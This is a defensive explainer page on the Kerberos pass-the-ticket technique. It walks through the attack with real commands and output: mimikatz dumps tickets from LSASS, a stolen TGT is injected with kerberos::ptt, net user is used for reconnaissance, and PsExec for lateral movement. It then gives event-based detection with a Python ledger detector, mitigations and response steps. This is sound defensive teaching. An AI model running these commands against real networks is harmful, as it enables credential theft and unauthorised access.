Pass-the-Ticket

Pass-the-ticket is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g. file shares and other computers) as a user without compromising that user’s password. This technique is often used by adversaries to move laterally through an organization’s network while hunting for opportunities to escalate privileges or fulfill their mission.

Both ticket-granting service (TGS) tickets and ticket-granting tickets (TGT) can be stolen and reused by adversaries. Without administrative privileges, an adversary can obtain the TGT (using “fake delegation”) and all TGS tickets for the current user. With administrative privileges, an adversary can dump the LSASS process and obtain all TGTs and TGS tickets cached on the system.

Threat Summary

Target: Active Directory
Tools:
ATT&CK® Tactic:
ATT&CK Technique:

Difficulty
Detect: Medium
Mitigate: Hard
Respond: Medium

How Pass-the-Ticket Works

Step 1: An adversary uses a tool like mimikatz to extract Kerberos tickets from the memory of the LSASS.exe process.

########
# In order to capture TGTs, this invocation of mimikatz must be run from an 
# elevated shell.
########
PS> mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
########
# mimikatz outputs all tickets to screen, and writes them individually to files
# in the current directory. We have truncated the output to show a single session.
########
Authentication Id : 0 ; 31770591 (00000000:01e4c7df)
Session           : RemoteInteractive from 4
User Name         : joed
Domain            : DOMAIN
Logon Server      : DC1
Logon Time        : 03/07/2020 08:07:58
SID               : S-1-5-21-3501040295-3816137123-30697657-1109
 
         * Username : joed
         * Domain   : DOMAIN.COM
         * Password : (null)
 
        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
           Service Name (03) : host ; host.domain.com ; @ DOMAIN.COM
           Target Name  (03) : host ; host.domain.com ; @ DOMAIN.COM
           Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN.COM )
           Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             516bedd608a71be859f1c0fa450708d915cd7e3bd99df793057ac110debfa98e
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1e4c7df]-0-0-40a10000-joed@host-host.domain.com.kirbi !
 
        Group 1 - Client Ticket ?
 
        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
           Service Name (02) : krbtgt ; DOMAIN.COM ; @ DOMAIN.COM
           Target Name  (02) : krbtgt ; DOMAIN ; @ DOMAIN.COM
           Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             34911deb40f5b400cfd9d8234b36dfdf2064b27bfabccdd65f077ed90918d85d
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi !
PS>

Step 2: Next, the threat actor uses mimikatz.exe kerberos::ptt (or a tool with similar capabilities) to inject the stolen TGT into their own session, causing their session to adopt the identity and privileges of the stolen TGT for subsequent authentications to resources.

PS> mimikatz.exe "kerberos::ptt C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi"
 
* File: 'C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi': OK
PS>
# The following command can be used to verify that the right ticket was successfully injected
PS> mimikatz.exe "kerberos::list"
[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
   Server Name       : krbtgt/DOMAIN.COM @ DOMAIN.COM
   Client Name       : joed @ DOMAIN.COM
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
PS>

Step 3: Once a stolen ticket is ready for reuse, the threat actor needs to determine where it can be used. A stolen TGS can only be used to access the resource it was issued for, and an adversary can determine that resource by inspecting the TGS itself. If, however, the attacker was able to steal a TGT, the attacker may need to conduct internal reconnaissance to determine what access the user has to resources that would further the attacker’s objectives.

This may be as straightforward as querying the user’s group memberships looking for obvious indicators. Many tools exist to enumerate Active Directory, but an adversary can “live off the land” and use built-in commands like net to discover these details.

PS> net user joed /domain
The request will be processed at a domain controller for domain domain.com.
 
User name                    joed
Full Name                    Joe Dibley
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            6/15/2020 3:42:00 PM
Password expires             Never
Password changeable          6/16/2020 3:42:00 PM
Password required            Yes
User may change password     Yes
 
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/9/2020 6:26:56 PM
 
Logon hours allowed          All
 
Local Group Memberships
Global Group memberships     *Workstation Administrators *VPNUser
                             *FileServer1_PublicShare *Domain Users
The command completed successfully.
PS>

Step 4: Using the stolen ticket and the information about the user’s privileges gleaned from internal reconnaissance, the threat actor can use lateral movement techniques to attempt to access other resources and further their objectives.

PS> .\PsExec.exe \\workstation456 powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS> hostname
workstation456
PS> 

Detect, Mitigate, and Respond

Detect (Difficulty: Medium)

Endpoints and Active Directory are both sources of signals indicating active use of pass-the-ticket in an environment.

Detection on the endpoint is accomplished by:

  1. Detecting the hooking of LSASS.exe for retrieving or injecting Kerberos tickets. Many Endpoint Detection and Response solutions are capable of this; or,
  2. Analyzing logged-on sessions for a username mismatch in the logged-on user and its Kerberos tickets. We’ve created a proof-of-concept for this detection, written in PowerShell.

Detection in Active Directory can be accomplished by collecting and correlating several Kerberos event types:

  1. Develop a ledger of when a ticket-granting ticket was issued to a user and on which endpoint. Auditing of “A Kerberos Authentication Ticket (TGT) was requested” (Event ID 4768) and “A Kerberos Service Ticket was renewed” (Event ID 4770) is required to obtain these data points.
  2. Compare each request for a ticket-granting service (TGS) ticket against the ledger to determine that the requesting endpoint is the same as the endpoint the TGT was issued to. Auditing of “A Kerberos Service Ticket was requested” (Event ID 4769) and “A Kerberos Service Ticket was renewed” (Event ID 4770) is required to perform this analysis.

The volume of these events in all but the smallest environments is substantial, which makes manual analysis impractical. As a result, real-time, machine-driven detection is preferred. It is also not possible to detect the theft and use of a single service ticket (TGS) within Active Directory.
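The ledger-and-compare logic from the two steps above, as an added example that is not part of the original page or the authors’ PowerShell proof-of-concept. It walks constructed 4768/4769/4770 records in time order, records which endpoints (by client IP) each user’s TGT was issued or renewed to, and flags any TGS request from an endpoint that holds no TGT for that user. Endpoint identity by IP is an assumption of the example; VPN, NAT and DHCP churn will produce false positives that a production detection must tune out.

```python
from collections import defaultdict

# Constructed sample events (not from the page). Each mimics the fields a SIEM
# extracts from a domain controller's Security log: EventID, TargetUserName,
# IpAddress and ServiceName.
SAMPLE_EVENTS = [
    {"id": 4768, "user": "joed", "ip": "::ffff:10.0.0.25", "service": "krbtgt"},
    {"id": 4769, "user": "joed@DOMAIN.COM", "ip": "::ffff:10.0.0.25", "service": "host/host.domain.com"},
    {"id": 4768, "user": "alice", "ip": "::ffff:10.0.0.30", "service": "krbtgt"},
    {"id": 4770, "user": "alice", "ip": "::ffff:10.0.0.30", "service": "krbtgt"},   # TGT renewal
    {"id": 4769, "user": "alice@DOMAIN.COM", "ip": "::ffff:10.0.0.30", "service": "cifs/fileserver1"},
    # joed's TGT was only ever issued to 10.0.0.25; a TGS request from 10.0.0.99 is the PtT signal
    {"id": 4769, "user": "joed@DOMAIN.COM", "ip": "::ffff:10.0.0.99", "service": "cifs/workstation456"},
    # bob never obtained a TGT from this DC at all (e.g. ticket imported from elsewhere)
    {"id": 4769, "user": "bob@DOMAIN.COM", "ip": "::ffff:10.0.0.50", "service": "cifs/fileserver1"},
]


def norm_user(name):
    # 4769 logs the UPN (user@REALM) while 4768 logs the bare account name.
    return name.split("@", 1)[0].lower()


def norm_ip(ip):
    # Domain controllers log IPv4 clients as IPv4-mapped IPv6 ("::ffff:10.0.0.25").
    return ip[7:] if ip.lower().startswith("::ffff:") else ip


def find_suspect_tgs(events):
    """Return 4769 requests whose source endpoint holds no TGT for the requesting user."""
    ledger = defaultdict(set)   # user -> endpoints a TGT was issued or renewed to
    suspects = []
    for e in events:            # events must be in chronological order
        user, ip = norm_user(e["user"]), norm_ip(e["ip"])
        is_tgt_renewal = e["id"] == 4770 and e["service"].lower().startswith("krbtgt")
        if e["id"] == 4768 or is_tgt_renewal:
            ledger[user].add(ip)
        elif e["id"] == 4769 and ip not in ledger[user]:
            reason = ("no TGT ever issued to this user" if not ledger[user]
                      else f"TGT issued to {sorted(ledger[user])}, TGS requested from {ip}")
            suspects.append({"user": user, "ip": ip, "service": e["service"], "reason": reason})
    return suspects


if __name__ == "__main__":
    for hit in find_suspect_tgs(SAMPLE_EVENTS):
        print(f"SUSPECT {hit['user']} -> {hit['service']} from {hit['ip']}: {hit['reason']}")
```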

Mitigate (Difficulty: Hard)

While pass-the-ticket cannot be entirely eliminated, the best mitigations focus on making tickets harder to steal and limiting what a threat actor can do with a stolen ticket:

  • Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard uses virtualization-based security to isolate credential storage and permits only trusted processes to access it.
  • Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.

Respond (Difficulty: Medium)

Should the use of pass-the-ticket be detected, there are several actions one can take to immediately respond:

  • Reset the compromised user’s password, and optionally disable the user to a) force instantaneous replication to all domain controllers, and b) prevent further use of the compromised ticket.
  • Reset the password for all users who have logged on to an impacted machine.
  • Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities.
  • Activate the incident response process and alert the response team.